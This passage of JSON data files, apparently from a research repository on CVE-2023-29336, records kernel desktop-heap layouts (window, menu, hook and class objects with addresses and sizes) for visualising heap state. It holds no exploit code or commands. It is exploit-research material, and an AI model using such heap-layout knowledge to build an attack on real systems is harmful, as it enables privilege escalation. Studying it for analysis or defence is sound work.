"0xffffc8d500613dc0","Type":"INPUTCONTEXT","Handle":"0x10185","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500614350","Type":"WINDOW","Handle":"0x10186","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500614040","Type":"INPUTCONTEXT","Handle":"0x10187","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500614510","Type":"WINDOW","Handle":"0x10188","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006140b0","Type":"INPUTCONTEXT","Handle":"0x10189","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500614680","Type":"WINDOW","Handle":"0x1018a","Size":26,"UnusedBytes":16},{"Block":"0xffffc8d50061bd40","Type":"WINDOW:PROPLIST","Size":14,"UnusedBytes":8},{"Block":"0xffffc8d500613fb0","Type":"INPUTCONTEXT","Handle":"0x1018b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006148b0","Type":"WINDOW","Handle":"0x1018c","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500614a30","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500614cc0","Type":"WINDOW","Handle":"0x1018e","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006144c0","Type":"INPUTCONTEXT","Handle":"0x1018f","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500614e80","Type":"WINDOW","Handle":"0x10190","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500615150","Type":"WINDOW","Handle":"0x10192","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d5006153d0","Type":"WINDOW","Handle":"0x10194","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500614b00","Type":"HOOK","Handle":"0x10195","Size":7,"UnusedBytes":16},{"Block":"0xffffc8d500615900","Type":"WINDOW","Handle":"0x10196","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500614a70","Type":"INPUTCONTEXT","Handle":"0x10197","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500615b50","Type":"WINDOW","Handle":"0x10198","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500615dd0","Type":"WINDOW","Handle":"0x1019a","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500614e30","Type":"INPUTCONTEXT","Handle":"0x1019b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061af40","Type":"WINDOW","Handle":
"0x2019c","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500616820","Type":"WINDOW","Handle":"0x1019e","Size":26,"UnusedBytes":16},{"Block":"0xffffc8d500617fc0","Type":"WINDOW:PROPLIST","Size":15,"UnusedBytes":8},{"Block":"0xffffc8d500615010","Type":"INPUTCONTEXT","Handle":"0x1019f","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500616a20","Type":"WINDOW","Handle":"0x101a0","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500616ba0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500614b90","Type":"INPUTCONTEXT","Handle":"0x201a1","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500617180","Type":"WINDOW","Handle":"0x201a2","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d5006173f0","Type":"WINDOW","Handle":"0x101a4","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500615540","Type":"INPUTCONTEXT","Handle":"0x101a5","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500617570","Type":"WINDOW","Handle":"0x101a6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500615620","Type":"INPUTCONTEXT","Handle":"0x101a7","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006176f0","Type":"WINDOW","Handle":"0x101a8","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d5006178b0","Type":"WINDOW","Handle":"0x101aa","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500615f60","Type":"INPUTCONTEXT","Handle":"0x101ab","Size":6,"UnusedBytes":32},{"Block":"0xffffc8d500617bb0","Type":"WINDOW","Handle":"0x101ac","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500615fe0","Type":"INPUTCONTEXT","Handle":"0x101ad","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006181f0","Type":"WINDOW","Handle":"0x101ae","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500616050","Type":"INPUTCONTEXT","Handle":"0x101af","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500618580","Type":"WINDOW","Handle":"0x101b0","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061b580","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d5006160c0","Type":"INPUTCONTEXT","Handle":"0x101b1","Size":5,"UnusedBytes":16},{"Block
":"0xffffc8d500618800","Type":"WINDOW","Handle":"0x101b2","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500618990","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d500616130","Type":"INPUTCONTEXT","Handle":"0x101b3","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500618b40","Type":"WINDOW","Handle":"0x101b4","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500618cd0","Type":"WINDOW","Handle":"0x101b6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500616670","Type":"INPUTCONTEXT","Handle":"0x101b7","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500618e50","Type":"WINDOW","Handle":"0x101b8","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006166e0","Type":"INPUTCONTEXT","Handle":"0x101b9","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500619020","Type":"WINDOW","Handle":"0x101ba","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500616d80","Type":"INPUTCONTEXT","Handle":"0x101bb","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500619250","Type":"WINDOW","Handle":"0x101bc","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006193f0","Type":"WINDOW","Handle":"0x201be","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d5006196c0","Type":"WINDOW","Handle":"0x101c0","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500619bc0","Type":"WINDOW:PROPLIST","Size":8,"UnusedBytes":8},{"Block":"0xffffc8d500616dd0","Type":"HOOK","Handle":"0x201c1","Size":7,"UnusedBytes":16},{"Block":"0xffffc8d5006199e0","Type":"WINDOW","Handle":"0x101c2","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061b540","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d500616f40","Type":"INPUTCONTEXT","Handle":"0x101c3","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500619c40","Type":"WINDOW","Handle":"0x101c4","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500616fb0","Type":"INPUTCONTEXT","Handle":"0x101c5","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500619eb0","Type":"WINDOW","Handle":"0x101c6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061a060","Type":"WINDOW","Handle":"0x101c8","
Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061a350","Type":"WINDOW","Handle":"0x101ca","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500619840","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500617310","Type":"INPUTCONTEXT","Handle":"0x101cb","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061a660","Type":"WINDOW","Handle":"0x101cc","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006173a0","Type":"INPUTCONTEXT","Handle":"0x101cd","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500611c30","Type":"WINDOW","Handle":"0x201ce","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500621220","Type":"MENU","Handle":"0x301cf","Size":10,"UnusedBytes":8},{"Block":"0xffffc8d500628eb0","Type":"MENU:ITEMS","Size":145,"UnusedBytes":16},{"Block":"0xffffc8d50061aca0","Type":"WINDOW","Handle":"0x101d0","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50061a820","Type":"WINDOW","Handle":"0x201d2","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500616180","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d50061b1f0","Type":"WINDOW","Handle":"0x101d4","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061b3d0","Type":"WINDOW","Handle":"0x101d6","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500620290","Type":"WINDOW","Handle":"0x301da","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061bb00","Type":"WINDOW","Handle":"0x101dc","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50061bfa0","Type":"WINDOW","Handle":"0x101de","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061c110","Type":"WINDOW","Handle":"0x101e0","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061c280","Type":"WINDOW","Handle":"0x101e2","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500617a70","Type":"INPUTCONTEXT","Handle":"0x1a01e3","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061c3f0","Type":"WINDOW","Handle":"0x101e4","Size":26,"UnusedBytes":16},{"Block":"0xffffc8d50061d190","Type":"WINDOW:PROPLIST","Size":12,"UnusedBytes":8},{"Block":"0xffffc8d50061c5e0","Type":"WINDOW","Handle":"0x101e
6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060c110","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500615370","Type":"INPUTCONTEXT","Handle":"0x101e7","Size":6,"UnusedBytes":32},{"Block":"0xffffc8d50061c9d0","Type":"WINDOW","Handle":"0x101e8","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500617d50","Type":"INPUTCONTEXT","Handle":"0x101e9","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500621fd0","Type":"WINDOW","Handle":"0x301ea","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500620ed0","Type":"INPUTCONTEXT","Handle":"0x1b01eb","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061c820","Type":"INPUTCONTEXT","Handle":"0x101ec","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500617e30","Type":"INPUTCONTEXT","Handle":"0x101ed","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061cbf0","Type":"INPUTCONTEXT","Handle":"0x101ee","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006180b0","Type":"INPUTCONTEXT","Handle":"0x101ef","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061cc40","Type":"WINDOW","Handle":"0x101f0","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50061cdf0","Type":"INPUTCONTEXT","Handle":"0x101f2","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061ce40","Type":"WINDOW","Handle":"0x101f4","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50061d020","Type":"INPUTCONTEXT","Handle":"0x101f6","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500618440","Type":"INPUTCONTEXT","Handle":"0x101f7","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061d090","Type":"INPUTCONTEXT","Handle":"0x101f8","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006189c0","Type":"INPUTCONTEXT","Handle":"0x101f9","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061cb70","Type":"INPUTCONTEXT","Handle":"0x101fa","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500618a30","Type":"INPUTCONTEXT","Handle":"0x101fb","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061d250","Type":"WINDOW","Handle":"0x101fc","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500618fd0","Type":"INPUTCONTEXT"
,"Handle":"0x101fd","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061d0e0","Type":"INPUTCONTEXT","Handle":"0x101fe","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061d3d0","Type":"WINDOW","Handle":"0x10200","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061d720","Type":"WINDOW","Handle":"0x10202","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061db80","Type":"INPUTCONTEXT","Handle":"0x20203","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061d890","Type":"WINDOW","Handle":"0x10204","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50060ef90","Type":"INPUTCONTEXT","Handle":"0x60205","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061da00","Type":"WINDOW","Handle":"0x10206","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061dbf0","Type":"WINDOW","Handle":"0x10208","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061dd70","Type":"WINDOW","Handle":"0x1020a","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061def0","Type":"WINDOW","Handle":"0x1020c","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50061e100","Type":"WINDOW","Handle":"0x1020e","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061e2a0","Type":"WINDOW","Handle":"0x10210","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500604a20","Type":"INPUTCONTEXT","Handle":"0x40211","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061e440","Type":"WINDOW","Handle":"0x10212","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061e620","Type":"WINDOW","Handle":"0x10214","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d5006213d0","Type":"MENU","Handle":"0x5021b","Size":10,"UnusedBytes":8},{"Block":"0xffffc8d5006288c0","Type":"MENU:ITEMS","Size":73,"UnusedBytes":16},{"Block":"0xffffc8d5006113a0","Type":"INPUTCONTEXT","Handle":"0x50225","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500622870","Type":"INPUTCONTEXT","Handle":"0x10242","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006228e0","Type":"INPUTCONTEXT","Handle":"0xa0244","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006230f0","Type":"INPUTCONTEXT","Handle":"0x30248","Size":
5,"UnusedBytes":16},{"Block":"0xffffc8d500622bc0","Type":"WINDOW","Handle":"0x3024a","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500622d90","Type":"WINDOW","Handle":"0x3024c","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500623160","Type":"INPUTCONTEXT","Handle":"0x1024e","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006231d0","Type":"INPUTCONTEXT","Handle":"0x20250","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500625230","Type":"WINDOW","Handle":"0x40252","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006234b0","Type":"WINDOW","Handle":"0x30254","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500623680","Type":"WINDOW","Handle":"0x10256","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500623ab0","Type":"WINDOW","Handle":"0x10258","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500623d70","Type":"WINDOW","Handle":"0x1025a","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500624010","Type":"WINDOW","Handle":"0x1025c","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006242a0","Type":"WINDOW","Handle":"0x1025e","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500624530","Type":"WINDOW","Handle":"0x10260","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500624cf0","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d500625bd0","Type":"WINDOW","Handle":"0x20262","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500620d20","Type":"WINDOW","Handle":"0x50266","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d5006247a0","Type":"WINDOW","Handle":"0x1026c","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500609c30","Type":"WINDOW","Handle":"0x70270","Size":25,"UnusedBytes":32},{"Block":"0xffffc8d500627e60","Type":"WINDOW:PROPLIST","Size":9,"UnusedBytes":8},{"Block":"0xffffc8d500626040","Type":"WINDOW","Handle":"0x40272","Size":24,"UnusedBytes":12},{"Block":"0xffffc8d500624940","Type":"WINDOW","Handle":"0x10274","Size":24,"UnusedBytes":8},{"Block":"0xffffc8d500602940","Type":"WINDOW","Handle":"0x2027c","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500624d30","Type":"WINDOW","Hand
le":"0x1027e","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500624ed0","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d50061be20","Type":"INPUTCONTEXT","Handle":"0x20280","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500624f10","Type":"INPUTCONTEXT","Handle":"0x10284","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006253c0","Type":"INPUTCONTEXT","Handle":"0x10286","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500625500","Type":"WINDOW","Handle":"0x10288","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006256b0","Type":"WINDOW","Handle":"0x1028a","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500625940","Type":"WINDOW","Handle":"0x1028c","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500626340","Type":"WINDOW","Handle":"0x6029c","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500626960","Type":"WINDOW","Handle":"0x7029e","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006264d0","Type":"WINDOW","Handle":"0x402a0","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500626b40","Type":"WINDOW","Handle":"0x102aa","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500626d20","Type":"WINDOW","Handle":"0x102ac","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500626f00","Type":"WINDOW","Handle":"0x102ae","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500620960","Type":"WINDOW","Handle":"0x202b0","Size":24,"UnusedBytes":12},{"Block":"0xffffc8d5006214e0","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d500620f50","Type":"WINDOW","Handle":"0x102b2","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500628300","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500627fa0","Type":"WINDOW","Handle":"0x102b4","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500628160","Type":"WINDOW","Handle":"0x202b6","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006297c0","Type":"WINDOW","Handle":"0x102b8","Size":24,"UnusedBytes":8},{"Block":"0xffffc8d500626af0","Type":"INPUTCONTEXT","Handle":"0x402b9","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500626cd0","
Type":"INPUTCONTEXT","Handle":"0x402bd","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50062a140","Type":"WINDOW","Handle":"0x102be","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500626eb0","Type":"INPUTCONTEXT","Handle":"0x102bf","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50062a480","Type":"WINDOW","Handle":"0x102c0","Size":37,"UnusedBytes":8},{"Block":"0xffffc8d500627090","Type":"INPUTCONTEXT","Handle":"0x102c3","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50062a920","Type":"WINDOW","Handle":"0x102c4","Size":37,"UnusedBytes":8},{"Block":"0xffffc8d500627370","Type":"INPUTCONTEXT","Handle":"0x202c7","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500620cd0","Type":"INPUTCONTEXT","Handle":"0x5f02cb","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061bf00","Type":"INPUTCONTEXT","Handle":"0x202cd","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500629c00","Type":"INPUTCONTEXT","Handle":"0x402e3","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500628360","Type":"INPUTCONTEXT","Handle":"0x102e7","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006283b0","Type":"HOOK","Handle":"0x102e9","Size":8,"UnusedBytes":32},{"Block":"0xffffc8d500629960","Type":"INPUTCONTEXT","Handle":"0x102eb","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500629b90","Type":"INPUTCONTEXT","Handle":"0x202ed","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50064f3e0","Type":"MENU","Handle":"0x104ab","Size":10,"UnusedBytes":8},{"Block":"0xffffc8d50064fa80","Type":"MENU:ITEMS","Size":73,"UnusedBytes":16},{"Block":"0xffffc8d50064f480","Type":"MENU","Handle":"0x104ad","Size":10,"UnusedBytes":8},{"Block":"0xffffc8d50064f520","Type":"MENU:ITEMS","Size":73,"UnusedBytes":16},{"Block":"0xffffc8d50062ab70","Type":"MENU","Handle":"0x104af","Size":10,"UnusedBytes":8},{"Block":"0xffffc8d50064f270","Type":"WINDOW","Handle":"0x204ba","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500629ed0","Type":"WINDOW","Handle":"0x204bc","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50062bfa0","Type":"CLS","Size":11,"UnusedBytes":16},{"
Block":"0xffffc8d50062c050","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062be00","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062beb0","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062bc60","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062bd10","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062bac0","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062bb70","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062b920","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062b9d0","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062b780","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062b830","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062b5e0","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062b690","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062b440","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062b4f0","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062b2a0","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062b350","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062b100","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062b1b0","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062af80","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50064ff90","Type":"CLS:NAME","Size":3,"UnusedBytes":41},{"Block":"0xffffc8d50062ae20","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50064ff50","Type":"CLS:NAME","Size":2,"UnusedBytes":27},{"Block":"0xffffc8d50062acc0","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d5006155b0","Type":"CLS:NAME","Size":2,"UnusedBytes":27},{"Block":"0xffffc8d500620570","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d500629b50","Type":"CLS:NAME","Size":2,"UnusedBytes":27},{"Block":"0xffffc8d500620410"
,"Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d500629b10","Type":"CLS:NAME","Size":2,"UnusedBytes":27},{"Block":"0xffffc8d5006299b0","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d500617120","Type":"CLS:NAME","Size":2,"UnusedBytes":27},{"Block":"0xffffc8d50062a040","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062a0f0","Type":"CLS:NAME","Size":3,"UnusedBytes":25},{"Block":"0xffffc8d50062a6d0","Type":"CLS","Size":37,"UnusedBytes":16},{"Block":"0xffffc8d50064f240","Type":"CLS:NAME","Size":3,"UnusedBytes":21},{"Block":"0xffffc8d50062a390","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062a440","Type":"CLS:NAME","Size":4,"UnusedBytes":23},{"Block":"0xffffc8d500629d20","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d500629dd0","Type":"CLS:NAME","Size":3,"UnusedBytes":21},{"Block":"0xffffc8d50062a2e0","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062a120","Type":"CLS:NAME","Size":2,"UnusedBytes":9},{"Block":"0xffffc8d500629e00","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d500629eb0","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d500629c50","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d500629d00","Type":"CLS:NAME","Size":2,"UnusedBytes":25}]},"Freed":[{"Block":"0xffffc8d50064ff70","Size":2},{"Block":"0xffffc8d500615590","Size":2},{"Block":"0xffffc8d500629b30","Size":2},{"Block":"0xffffc8d50064f9d0","Size":2},{"Block":"0xffffc8d5006155d0","Size":3},{"Block":"0xffffc8d50062aed0","Size":11},{"Block":"0xffffc8d50062ad70","Size":11},{"Block":"0xffffc8d50062ac10","Size":11},{"Block":"0xffffc8d5006204c0","Size":11},{"Block":"0xffffc8d500629a60","Size":11},{"Block":"0xffffc8d50062bed0","Size":13},{"Block":"0xffffc8d50062bd30","Size":13},{"Block":"0xffffc8d50062bb90","Size":13},{"Block":"0xffffc8d50062b9f0","Size":13},{"Block":"0xffffc8d50062b850","Size":13},{"Block":"0xffffc8d50062b6b0","Size":13},{"Block":"0xffffc8d50062b510","Size":13},{"Block":"0xf
fffc8d50062b370","Size":13},{"Block":"0xffffc8d50062b1d0","Size":13},{"Block":"0xffffc8d50062b030","Size":13},{"Block":"0xffffc8d50062c070","Size":8989}]} 2 | -------------------------------------------------------------------------------- /cve-2023-29336/visualisation/src/menu-created.memorylayout.json: -------------------------------------------------------------------------------- 1 | {"HeapFirstEntry":"0xffffc8d5006006f0","HeapLastValidEntry":"0xffffc8d501a00000","Granularity":16,"Allocated":{"Objects":[{"Block":"0xffffc8d500600810","Type":"WINDOW","Handle":"0x10010","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061e5c0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500600a50","Type":"WINDOW","Handle":"0x10012","Size":24,"UnusedBytes":20},{"Block":"0xffffc8d500600ca0","Type":"WINDOW","Handle":"0x10014","Size":26,"UnusedBytes":8},{"Block":"0xffffc8d50061f510","Type":"WINDOW","Handle":"0x40018","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006011d0","Type":"WINDOW","Handle":"0x1001c","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006013c0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500601730","Type":"WINDOW","Handle":"0x2001e","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006018e0","Type":"WINDOW","Handle":"0x10020","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061eaf0","Type":"WINDOW","Handle":"0x20026","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061ed50","Type":"WINDOW","Handle":"0x20028","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061f390","Type":"WINDOW","Handle":"0x20038","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006221f0","Type":"WINDOW","Handle":"0x4003a","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061e850","Type":"WINDOW","Handle":"0x2003c","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50061fe00","Type":"WINDOW","Handle":"0x20040","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006226d0","Type":"WINDOW","Handle":"0x2004e","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500622370","
Type":"WINDOW","Handle":"0x30050","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500627850","Type":"WINDOW","Handle":"0x30052","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500621d70","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d50061eef0","Type":"WINDOW","Handle":"0x30054","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50061f0b0","Type":"WINDOW","Handle":"0x20056","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006036b0","Type":"INPUTCONTEXT","Handle":"0x2006b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500620100","Type":"WINDOW","Handle":"0x5006c","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d5006279d0","Type":"WINDOW","Handle":"0x3006e","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500627ce0","Type":"WINDOW","Handle":"0x30070","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500617ac0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d5006020b0","Type":"INPUTCONTEXT","Handle":"0